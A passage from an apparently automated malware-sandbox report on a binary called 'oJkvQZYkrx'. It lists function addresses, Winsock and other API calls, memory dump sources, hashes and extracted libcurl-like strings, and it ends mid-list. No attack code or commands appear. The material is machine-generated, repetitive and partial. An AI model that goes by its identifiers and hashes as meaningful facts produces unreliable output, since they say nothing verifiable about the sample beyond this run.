                                                          • Instruction Fuzzy Hash: D111967090878595EB268F18D4027F6B3F8EFD4329F109A18F59942150F7329AC68BC2
                                                          Function 0091A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0091A97E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID:
                                                          • API String ID: 2809346765-0
                                                          • Opcode ID: f857241a0f793d098b2e1be58fb0b8b0a71adce0f0f70fd92067ce3d93ffe6f9
                                                          • Instruction ID: 237523b66573f133b95bc4ab7ef482f8c91932d48147e5f98d76b797d9ef3daf
                                                          • Opcode Fuzzy Hash: f857241a0f793d098b2e1be58fb0b8b0a71adce0f0f70fd92067ce3d93ffe6f9
                                                          • Instruction Fuzzy Hash: 8C01A272B01714AFC6148F24DC45B9AB7A5EF84720F068659FA982B361C331BC518BD1
                                                          Function 0091AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • socket.WS2_32(?,0091B280,00000000,-00000001,00000000,0091B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0091AF66
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID:
                                                          • API String ID: 98920635-0
                                                          • Opcode ID: 7bd5e978b71d6a896b2e206952f798ec64dbb77c411c18b1a5021f64b480b175
                                                          • Instruction ID: 25330d6c6635a304385b05fd700061d805fd615e12ecb11a3577a9cb123aceaa
                                                          • Opcode Fuzzy Hash: 7bd5e978b71d6a896b2e206952f798ec64dbb77c411c18b1a5021f64b480b175
                                                          • Instruction Fuzzy Hash: 30E0EDB2B052216FD6649A58E8449ABF3ADEFC4B20F454A49BC5863304C330AC518BE2
                                                          Function 0091B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • closesocket.WS2_32(?,00919422,?,?,?,?,?,?,?,?,?,?,?,00903377,00C97680,00000000), ref: 0091B04D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID:
                                                          • API String ID: 2781271927-0
                                                          • Opcode ID: ce386ed248f468c79c667241c51e5eb81d1ac9f69072057d5890646163751f55
                                                          • Instruction ID: 04b1f4cceba3948f48cf164139bb0955e2f5e61110f7b741808c20ba3520cb24
                                                          • Opcode Fuzzy Hash: ce386ed248f468c79c667241c51e5eb81d1ac9f69072057d5890646163751f55
                                                          • Instruction Fuzzy Hash: 73D0C23430020157CA208A14C884AA7726F7FC4310FA8CB6CE02C8A168C73BCC838601
                                                          Function 008B67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ioctlsocket.WS2_32(?,8004667E,?,?,0088AF56,?,00000001), ref: 008B67FC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocket
                                                          • String ID:
                                                          • API String ID: 3577187118-0
                                                          • Opcode ID: 55ca8fa4ba1ac7e28c8a3e3681667e1f830ad68d887196ec1e08bff1d0beaa6c
                                                          • Instruction ID: cf197a33307673fae5981a8a78e34832f12856552c5e8151f62079c405236f7b
                                                          • Opcode Fuzzy Hash: 55ca8fa4ba1ac7e28c8a3e3681667e1f830ad68d887196ec1e08bff1d0beaa6c
                                                          • Instruction Fuzzy Hash: 06C012F1218101AFC6088724D455F2FB6D9DB44365F01581CB046C1190EA305990CA16
                                                          Function 008531D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: a3e9ac6fd11efb4093f05eec7bf1f3d7a16ac9adb7b8eb710804b0d8573eb370
                                                          • Instruction ID: b932a4ea0c37faed52fffb731d2ba9a96ffabf20636fdea90ab9d4c628a56c1f
                                                          • Opcode Fuzzy Hash: a3e9ac6fd11efb4093f05eec7bf1f3d7a16ac9adb7b8eb710804b0d8573eb370
                                                          • Instruction Fuzzy Hash: E33181B49097099BCB00FFB8D58569EBBF0BF44345F00886EE898A7351E7749A449F52
                                                          Function 00BDB160 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 654e0b610147b173e875299ba9137259ec6a27a6d7539031e13e83eefa41caa8
                                                          • Instruction ID: 60e6713b43b4d9fa7879987f819e17e411a4ec6b7dd2b580156877a8f3d5cbd8
                                                          • Opcode Fuzzy Hash: 654e0b610147b173e875299ba9137259ec6a27a6d7539031e13e83eefa41caa8
                                                          • Instruction Fuzzy Hash: A8C04CE0C1464586D710BB38854611DB9E47781108FD11AA8998996195F62893588657

                                                          Non-executed Functions

                                                          Function 00891BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                          • API String ID: 0-1371176463
                                                          • Opcode ID: a52c79f8e3b8617c13d4ce0622deed81370610d28e85cdce2134fbceb94f9333
                                                          • Instruction ID: fb6b019b203a96e5c1ba67519befe63dbd074122cb43d00b219ad73f8586bf27
                                                          • Opcode Fuzzy Hash: a52c79f8e3b8617c13d4ce0622deed81370610d28e85cdce2134fbceb94f9333
                                                          • Instruction Fuzzy Hash: 60B21671A08701BFEF20BA24EC46B66BBD5FF94705F0C4428F889D6292FB75E8449752
                                                          Function 00864940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                          • API String ID: 0-122532811
                                                          • Opcode ID: e4bea2154f96d7b0bb494d0fc54cde9f17fcdb5318ad122642418bbb7373f704
                                                          • Instruction ID: 35aab566b96c61059be7c10645153c66c25498eb5b95b778dfde7800cd6fc0f1
                                                          • Opcode Fuzzy Hash: e4bea2154f96d7b0bb494d0fc54cde9f17fcdb5318ad122642418bbb7373f704
                                                          • Instruction Fuzzy Hash: 2D42E371B08704AFD7089E28CC81B6BB6EAFBC4704F058A2DF55DD7391E775A8148B92
                                                          Function 00863ED0 Relevance: 15.7, Strings: 12, Instructions: 689COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                          • API String ID: 0-3977460686
                                                          • Opcode ID: 31f2a3e6f3dae3651983a550e534886899123f81f1edce203edb6b5e35f76220
                                                          • Instruction ID: 406d69c057a0b5f9c3083b95bc10cd5332a7d8d8767da699edd90da63fb7a546
                                                          • Opcode Fuzzy Hash: 31f2a3e6f3dae3651983a550e534886899123f81f1edce203edb6b5e35f76220
                                                          • Instruction Fuzzy Hash: 74327A71A083054BC724AE28DC4132EB7D6FF91324F16572EE9AACB3D2E774D9458782
                                                          Function 00909880 Relevance: 15.2, Strings: 12, Instructions: 226COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629689923.00000000013A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629757165.00000000013A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_850000_oJkvQZYkrx.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                          • API String ID: 0-1574211403
                                                          • Opcode ID: d2e60c5ac3c5e0ae20df3c169fee13d9723f93379c9949b58d152f61073b2972
                                                          • Instruction ID: 29f6c66981f48bbbed76e1737f090e39e7f07778095b4f41455871a054e9ad8d
                                                          • Opcode Fuzzy Hash: d2e60c5ac3c5e0ae20df3c169fee13d9723f93379c9949b58d152f61073b2972
                                                          • Instruction Fuzzy Hash: 5C61D1A5F083046FE714A624AC52B3BB29D9BD5318F04883DFC9A963D3FA75D944C293
                                                          Function 00874F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1628140762.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                          • Associated: 00000000.00000002.1628113412.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000D00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1628140762.0000000000E65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629017905.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000E6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.0000000001103000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629046308.00000000011EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1629521347.00000000011F0000.00000080.00000001.01000000.00000003.sdmpDownload File
